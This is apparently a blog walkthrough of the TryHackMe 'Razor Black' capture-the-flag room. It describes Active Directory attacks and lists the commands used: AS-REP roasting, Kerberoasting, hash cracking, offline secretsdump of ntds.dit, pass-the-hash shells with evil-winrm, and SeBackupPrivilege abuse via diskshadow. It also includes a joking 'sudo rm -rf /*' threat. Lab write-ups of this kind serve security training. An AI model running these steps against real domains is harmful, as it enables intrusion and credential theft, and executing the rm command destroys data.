Introduction

In this walkthrough, we covered Active Directory penetration testing and Privilege Escalation through techniques such as ASREProsting and Kerebroasting.

These guys call themselves hackers. Can you show them who’s the boss ??

Throw something like a rock on the big green thingy on the right side here to deploy your box.

The box has ICMP enabled. So, look at ping first before starting recon and stop slapping `-Pn` on nmap.

This room is proudly made by: Xyan1d3

Recon and Initial Foothold

I started with a basic Nmap scan to see what ports were open. I found services like Kerberos, LDAP, and an NFS file share. I mounted the NFS share and found an Excel file with employee names and the first flag.

Using the employee list, I created a user list for Active Directory and performed AS-REP roasting to get a user hash. I cracked the hash with Hashcat and got a password.

With the username and password, I tried to access the SMB shares but was denied access to the “trash” share, which I knew contained a zip file. I used Metasploit to find other valid users and discovered that another user had the same password. This time, I was able to access the share and download the zip file. I then used zip2john and John the Ripper to crack the zip file’s password.

Hash Extraction and Privilege Escalation

Inside the zip file, I found a database of hashes. I used secretsdump.py in offline mode to extract hashes from the system.hive and ntds.dit files. I then used the cut command to separate the usernames and hashes into different files.

I used CrackMapExec to find the hash for a specific user, “alvitrova,” and then used that hash with evil-winrm to get a shell on the system. I found an XML file with an encoded string, which I decoded using a PowerShell command to get the flag.

I then used getuserSPNs.py to get the service principal name for another user, “zn,” and cracked the resulting hash to get their password. I got a shell as “zn” and found another encoded flag in an XML file.

To get root, I used the whoami /all command and found that the “zn” user had the SeBackupPrivilege. I exploited this by creating a diskshadow script to back up the ntds.dit and system.hive files. I downloaded these files to my machine and used secretsdump.py again to get the administrator hash.

Root and Final Secrets 🚩

With the administrator hash, I used evil-winrm to get a root shell. I found the root.xml file, which contained an encoded password that I decoded to get the root flag.

I also found a flag for the user “tyson” in a text file in their user directory.

For the final secret, I navigated to the “Top Secret” directory in “Program Files” and found an image file. The image contained a message about exiting vim, leading me to the final secret: :wq.

Technical Commands Used

Here are the technical commands I used in the terminal during the demonstration:

Nmap and NFS

  • sudo nmap -sV [IP address]
  • nmap -p [port] [IP address]
  • showmount -e [IP address]
  • sudo mount -t nfs -o vers=3 [IP address]:/users /home/user/users_thm

File and Hash Operations

  • python3 getNPUsers.py -dc-ip [IP address] -usersfile users_rz.txt -format hashcat -outputfile asrep_hash.txt
  • hashcat -m 18200 asrep_hash.txt [wordlist]
  • zip2john [zip_file] > [output_hash_file]
  • john --wordlist=[wordlist] [hash_file]
  • python3 secretsdump.py -system [system_file] -ntds [ntds_database] local -outputfile hashes_v1.txt
  • cut -d':' -f1 hashes_v1.txt > users_v2.txt
  • cut -d':' -f4 hashes_v1.txt > hashes_v2.txt

SMB and Metasploit

  • smbmap -u [username] -p [password] -H [IP address]
  • use auxiliary/scanner/smb/smb_enumusers
  • smbclient //[IP address]/[share_name] -U [username]%[password]

Shells and Privilege Escalation

  • crackmapexec smb [IP address] -u [username] -H [hash_file]
  • evil-winrm -i [IP address] -u [username] -H [hash]
  • $credential = Import-CliXml -Path "[path_to_xml_file]"
  • $credential.GetNetworkCredential().Password
  • python3 getuserSPNs.py -dc-ip [IP address] [domain]/[username]:[hash] -request -outputfile zn_hash_v2.txt
  • whoami /all
  • diskshadow.exe /s diskshadow.txt
  • Import-Module [dll_file]
  • Copy-FileBackupPrivilege -Source "[source_path]" -Destination "[destination_path]"

Video Walk-through

TryHackMe Razor Black Room Answers

What is the Domain Name?
 
What is Steven’s Flag?
 

What is the zip file’s password?

 
What is Ljudmila’s Hash?
 

What is Ljudmila’s Flag?

 

What is Xyan1d3’s password?

 

What is Xyan1d3’s Flag?

 

What is the root Flag?

 

What is Tyson’s Flag?

 

What is the complete top secret?

 

Did you like your cookie?

Say Yes or I will do sudo rm -rf /* on your PC

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles